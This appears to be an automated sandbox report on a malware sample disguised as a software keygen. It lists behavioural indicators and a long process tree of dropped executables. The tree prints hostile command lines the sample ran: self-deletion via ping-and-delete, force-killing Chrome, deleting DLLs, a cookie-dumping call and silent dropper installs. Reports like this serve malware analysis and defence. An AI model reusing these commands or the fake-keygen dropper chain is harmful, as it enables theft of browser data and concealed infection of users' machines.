5036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2808 PING.EXE 5804 PING.EXE 7720 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 138 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 144 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 329 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 337 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 192 setups.tmp 192 setups.tmp -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 4492 Setup.exe Token: SeCreateTokenPrivilege 200 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 200 askinstall20.exe Token: SeLockMemoryPrivilege 200 askinstall20.exe Token: SeIncreaseQuotaPrivilege 200 askinstall20.exe Token: SeMachineAccountPrivilege 200 askinstall20.exe Token: SeTcbPrivilege 200 askinstall20.exe Token: SeSecurityPrivilege 200 askinstall20.exe Token: SeTakeOwnershipPrivilege 200 askinstall20.exe Token: SeLoadDriverPrivilege 200 askinstall20.exe Token: SeSystemProfilePrivilege 200 askinstall20.exe Token: SeSystemtimePrivilege 200 askinstall20.exe Token: SeProfSingleProcessPrivilege 200 askinstall20.exe Token: SeIncBasePriorityPrivilege 200 askinstall20.exe Token: SeCreatePagefilePrivilege 200 askinstall20.exe Token: SeCreatePermanentPrivilege 200 askinstall20.exe Token: SeBackupPrivilege 200 askinstall20.exe Token: SeRestorePrivilege 200 askinstall20.exe Token: SeShutdownPrivilege 200 askinstall20.exe Token: SeDebugPrivilege 200 askinstall20.exe Token: SeAuditPrivilege 200 askinstall20.exe Token: SeSystemEnvironmentPrivilege 200 askinstall20.exe Token: SeChangeNotifyPrivilege 200 askinstall20.exe Token: SeRemoteShutdownPrivilege 200 askinstall20.exe Token: SeUndockPrivilege 200 askinstall20.exe Token: SeSyncAgentPrivilege 200 askinstall20.exe Token: SeEnableDelegationPrivilege 200 askinstall20.exe Token: SeManageVolumePrivilege 200 askinstall20.exe Token: SeImpersonatePrivilege 200 askinstall20.exe Token: SeCreateGlobalPrivilege 200 askinstall20.exe Token: 31 200 askinstall20.exe Token: 32 200 askinstall20.exe Token: 33 200 askinstall20.exe Token: 34 200 askinstall20.exe Token: 35 200 askinstall20.exe Token: SeDebugPrivilege 4536 multitimer.exe Token: SeDebugPrivilege 2112 taskkill.exe Token: SeDebugPrivilege 2820 MicrosoftEdge.exe Token: SeDebugPrivilege 2820 MicrosoftEdge.exe Token: SeDebugPrivilege 2820 MicrosoftEdge.exe Token: SeDebugPrivilege 2820 MicrosoftEdge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4676 setups.exe 192 setups.tmp 2820 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 4708 wrote to memory of 984 4708 Delphi_Wmi_Class_Generator_serial_keys_gen.exe 78 PID 4708 wrote to memory of 984 4708 Delphi_Wmi_Class_Generator_serial_keys_gen.exe 78 PID 4708 wrote to memory of 984 4708 Delphi_Wmi_Class_Generator_serial_keys_gen.exe 78 PID 984 wrote to memory of 416 984 cmd.exe 81 PID 984 wrote to memory of 416 984 cmd.exe 81 PID 984 wrote to memory of 416 984 cmd.exe 81 PID 984 wrote to memory of 564 984 cmd.exe 82 PID 984 wrote to memory of 564 984 cmd.exe 82 PID 984 wrote to memory of 564 984 cmd.exe 82 PID 984 wrote to memory of 804 984 cmd.exe 83 PID 984 wrote to memory of 804 984 cmd.exe 83 PID 984 wrote to memory of 804 984 cmd.exe 83 PID 984 wrote to memory of 400 984 cmd.exe 84 PID 984 wrote to memory of 400 984 cmd.exe 84 PID 984 wrote to memory of 400 984 cmd.exe 84 PID 416 wrote to memory of 4396 416 keygen-pr.exe 85 PID 416 wrote to memory of 4396 416 keygen-pr.exe 85 PID 416 wrote to memory of 4396 416 keygen-pr.exe 85 PID 400 wrote to memory of 4492 400 keygen-step-4.exe 86 PID 400 wrote to memory of 4492 400 keygen-step-4.exe 86 PID 804 wrote to memory of 2180 804 keygen-step-3.exe 88 PID 804 wrote to memory of 2180 804 keygen-step-3.exe 88 PID 804 wrote to memory of 2180 804 keygen-step-3.exe 88 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 4396 wrote to memory of 2252 4396 key.exe 87 PID 2180 wrote to memory of 2808 2180 cmd.exe 91 PID 2180 wrote to memory of 2808 2180 cmd.exe 91 PID 2180 wrote to memory of 2808 2180 cmd.exe 91 PID 4492 wrote to memory of 4536 4492 Setup.exe 92 PID 4492 wrote to memory of 4536 4492 Setup.exe 92 PID 4492 wrote to memory of 4676 4492 Setup.exe 93 PID 4492 wrote to memory of 4676 4492 Setup.exe 93 PID 4492 wrote to memory of 4676 4492 Setup.exe 93 PID 4676 wrote to memory of 192 4676 setups.exe 94 PID 4676 wrote to memory of 192 4676 setups.exe 94 PID 4676 wrote to memory of 192 4676 setups.exe 94 PID 400 wrote to memory of 200 400 keygen-step-4.exe 95 PID 400 wrote to memory of 200 400 keygen-step-4.exe 95 PID 400 wrote to memory of 200 400 keygen-step-4.exe 95 PID 200 wrote to memory of 3344 200 askinstall20.exe 98 PID 200 wrote to memory of 3344 200 askinstall20.exe 98 PID 200 wrote to memory of 3344 200 askinstall20.exe 98 PID 3344 wrote to memory of 2112 3344 cmd.exe 101 PID 3344 wrote to memory of 2112 3344 cmd.exe 101 PID 3344 wrote to memory of 2112 3344 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Delphi_Wmi_Class_Generator_serial_keys_gen.exe"C:\Users\Admin\AppData\Local\Temp\Delphi_Wmi_Class_Generator_serial_keys_gen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:2252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:564
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Users\Admin\AppData\Local\Temp\OGU7C70X56\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OGU7C70X56\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4536 -
C:\Users\Admin\AppData\Local\Temp\OGU7C70X56\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OGU7C70X56\multitimer.exe" 1 3.1617447936.60684c00b129c 1016⤵PID:1804
-
C:\Users\Admin\AppData\Local\Temp\OGU7C70X56\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OGU7C70X56\multitimer.exe" 2 3.1617447936.60684c00b129c7⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\2ikoes3h1as\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\2ikoes3h1as\KiffApp1.exe"8⤵PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\idd0z2d24gy\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\idd0z2d24gy\Setup3310.exe" /Verysilent /subid=5778⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\is-IJSH4.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-IJSH4.tmp\Setup3310.tmp" /SL5="$301F4,138429,56832,C:\Users\Admin\AppData\Local\Temp\idd0z2d24gy\Setup3310.exe" /Verysilent /subid=5779⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\is-TPHKD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TPHKD.tmp\Setup.exe" /Verysilent10⤵PID:4576
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:2380
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 94812⤵
- Program crash
PID:6832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 100412⤵
- Program crash
PID:7904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 101612⤵
- Program crash
PID:8176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 114812⤵
- Program crash
PID:5140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 118812⤵
- Program crash
PID:5500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 120412⤵
- Program crash
PID:7600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 154812⤵
- Program crash
PID:6480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 161612⤵
- Program crash
PID:4424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 159212⤵
- Program crash
PID:5552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 157212⤵
- Program crash
PID:6468
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:4100
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:1720
-
C:\Users\Admin\AppData\Local\Temp\is-P99G3.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-P99G3.tmp\LabPicV3.tmp" /SL5="$202B8,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\is-1E52N.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-1E52N.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:5896
-
C:\Program Files\Windows Portable Devices\BTLGLDWFLQ\prolab.exe"C:\Program Files\Windows Portable Devices\BTLGLDWFLQ\prolab.exe" /VERYSILENT14⤵PID:6648
-
C:\Users\Admin\AppData\Local\Temp\is-OJ59D.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-OJ59D.tmp\prolab.tmp" /SL5="$60030,575243,216576,C:\Program Files\Windows Portable Devices\BTLGLDWFLQ\prolab.exe" /VERYSILENT15⤵PID:6920
-
-
-
C:\Users\Admin\AppData\Local\Temp\0f-71d75-0bd-87180-067e65ffcb57d\SHaejaevihybo.exe"C:\Users\Admin\AppData\Local\Temp\0f-71d75-0bd-87180-067e65ffcb57d\SHaejaevihybo.exe"14⤵PID:6772
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lefsex5a.swm\md6_6ydj.exe & exit15⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\lefsex5a.swm\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\lefsex5a.swm\md6_6ydj.exe16⤵PID:5664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z0xj2ncq.gp3\Vidboxtest.exe & exit15⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\z0xj2ncq.gp3\Vidboxtest.exeC:\Users\Admin\AppData\Local\Temp\z0xj2ncq.gp3\Vidboxtest.exe16⤵PID:5540
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxtest.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\z0xj2ncq.gp3\Vidboxtest.exe" & del C:\ProgramData\*.dll & exit17⤵PID:7916
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Vidboxtest.exe /f18⤵
- Kills process with taskkill
PID:5132
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:8100
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5vnwxo4.x1z\askinstall31.exe & exit15⤵PID:7236
-
C:\Users\Admin\AppData\Local\Temp\b5vnwxo4.x1z\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\b5vnwxo4.x1z\askinstall31.exe16⤵PID:7436
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:4480
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5016
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hjrebrlh.mr2\toolspab1.exe & exit15⤵PID:7772
-
C:\Users\Admin\AppData\Local\Temp\hjrebrlh.mr2\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hjrebrlh.mr2\toolspab1.exe16⤵PID:6592
-
C:\Users\Admin\AppData\Local\Temp\hjrebrlh.mr2\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hjrebrlh.mr2\toolspab1.exe17⤵PID:5476
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vnqyiost.5qv\GcleanerWW.exe /mixone & exit15⤵PID:7156
-
-
-
C:\Users\Admin\AppData\Local\Temp\98-acc30-4d6-e77b2-83fd2f87e30c6\Repaemedaelae.exe"C:\Users\Admin\AppData\Local\Temp\98-acc30-4d6-e77b2-83fd2f87e30c6\Repaemedaelae.exe"14⤵PID:6776
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 98015⤵PID:6124
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\is-1P229.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-1P229.tmp\lylal220.tmp" /SL5="$20332,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\is-CDM5D.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-CDM5D.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:5200
-
C:\Program Files\Internet Explorer\PAQEVIVYRU\irecord.exe"C:\Program Files\Internet Explorer\PAQEVIVYRU\irecord.exe" /VERYSILENT14⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\is-PV20I.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-PV20I.tmp\irecord.tmp" /SL5="$30420,6265333,408064,C:\Program Files\Internet Explorer\PAQEVIVYRU\irecord.exe" /VERYSILENT15⤵PID:6820
-
-
-
C:\Users\Admin\AppData\Local\Temp\44-72f4f-09e-1ff9f-1b8ba6cd8ad8c\Gunahashosa.exe"C:\Users\Admin\AppData\Local\Temp\44-72f4f-09e-1ff9f-1b8ba6cd8ad8c\Gunahashosa.exe"14⤵PID:6720
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 75215⤵PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\fd-84cf0-2c2-f08ba-f67cb20f47631\Fumykowyqa.exe"C:\Users\Admin\AppData\Local\Temp\fd-84cf0-2c2-f08ba-f67cb20f47631\Fumykowyqa.exe"14⤵PID:6836
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vml2dlxq.ofk\md6_6ydj.exe & exit15⤵PID:5792
-
C:\Users\Admin\AppData\Local\Temp\vml2dlxq.ofk\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\vml2dlxq.ofk\md6_6ydj.exe16⤵PID:5488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p4bbncfu.afu\Vidboxtest.exe & exit15⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\p4bbncfu.afu\Vidboxtest.exeC:\Users\Admin\AppData\Local\Temp\p4bbncfu.afu\Vidboxtest.exe16⤵PID:7356
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxtest.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\p4bbncfu.afu\Vidboxtest.exe" & del C:\ProgramData\*.dll & exit17⤵
- Modifies Internet Explorer settings
PID:4736 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im Vidboxtest.exe /f18⤵
- Kills process with taskkill
PID:7700
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:5768
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kxrahyzw.f4k\askinstall31.exe & exit15⤵PID:7180
-
C:\Users\Admin\AppData\Local\Temp\kxrahyzw.f4k\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\kxrahyzw.f4k\askinstall31.exe16⤵PID:7572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hydmn3cb.asc\toolspab1.exe & exit15⤵PID:7896
-
C:\Users\Admin\AppData\Local\Temp\hydmn3cb.asc\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hydmn3cb.asc\toolspab1.exe16⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\hydmn3cb.asc\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hydmn3cb.asc\toolspab1.exe17⤵PID:4656
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fqxaseqi.kdj\GcleanerWW.exe /mixone & exit15⤵PID:6356
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:3620
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:2236
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:816
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:616
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:6084
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:2688
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5540
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:4844
-
C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\multitimer.exe" 1 3.1617448025.60684c599f65a 10313⤵PID:6496
-
C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\multitimer.exe" 2 3.1617448025.60684c599f65a14⤵PID:6848
-
C:\Users\Admin\AppData\Local\Temp\uoyv12gcbys\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\uoyv12gcbys\cpyrix.exe" /VERYSILENT15⤵PID:6460
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:4852
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"17⤵PID:4616
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub17⤵PID:7444
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe18⤵PID:2124
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:7936
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:4256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mholv1ziexp\vict.exe"C:\Users\Admin\AppData\Local\Temp\mholv1ziexp\vict.exe" /VERYSILENT /id=53515⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\is-4FGK0.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FGK0.tmp\vict.tmp" /SL5="$302D0,870426,780800,C:\Users\Admin\AppData\Local\Temp\mholv1ziexp\vict.exe" /VERYSILENT /id=53516⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\is-LLHFC.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-LLHFC.tmp\win1host.exe" 53517⤵PID:7784
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1uyr1yee2k\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\u1uyr1yee2k\Setup3310.exe" /Verysilent /subid=57715⤵PID:808
-
C:\Users\Admin\AppData\Local\Temp\is-NRP5C.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-NRP5C.tmp\Setup3310.tmp" /SL5="$3029E,138429,56832,C:\Users\Admin\AppData\Local\Temp\u1uyr1yee2k\Setup3310.exe" /Verysilent /subid=57716⤵PID:6736
-
C:\Users\Admin\AppData\Local\Temp\is-VTVFJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VTVFJ.tmp\Setup.exe" /Verysilent17⤵PID:2372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zkxvem3pbhn\app.exe"C:\Users\Admin\AppData\Local\Temp\zkxvem3pbhn\app.exe" /8-2315⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\zkxvem3pbhn\app.exe"C:\Users\Admin\AppData\Local\Temp\zkxvem3pbhn\app.exe" /8-2316⤵PID:5360
-
-
-
C:\Users\Admin\AppData\Local\Temp\qsl0eh3hcen\gofxdc4yxxv.exe"C:\Users\Admin\AppData\Local\Temp\qsl0eh3hcen\gofxdc4yxxv.exe" /ustwo INSTALL15⤵PID:1988
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gofxdc4yxxv.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\qsl0eh3hcen\gofxdc4yxxv.exe" & exit16⤵PID:7712
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gofxdc4yxxv.exe" /f17⤵
- Kills process with taskkill
PID:7696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gz41yry3lbd\r2ndh3j3242.exe"C:\Users\Admin\AppData\Local\Temp\gz41yry3lbd\r2ndh3j3242.exe"15⤵PID:5548
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gz41yry3lbd\r2ndh3j3242.exe"16⤵PID:856
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300017⤵
- Runs ping.exe
PID:7720
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EL9SYSWP6Y\setups.exe"C:\Users\Admin\AppData\Local\Temp\EL9SYSWP6Y\setups.exe" ll12⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\is-NO9SA.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-NO9SA.tmp\setups.tmp" /SL5="$3053E,635399,250368,C:\Users\Admin\AppData\Local\Temp\EL9SYSWP6Y\setups.exe" ll13⤵PID:5352
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"11⤵PID:4816
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:3100
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bdi5f0b1mly\kuwhjmelpjl.exe"C:\Users\Admin\AppData\Local\Temp\bdi5f0b1mly\kuwhjmelpjl.exe" /VERYSILENT8⤵PID:5332
-
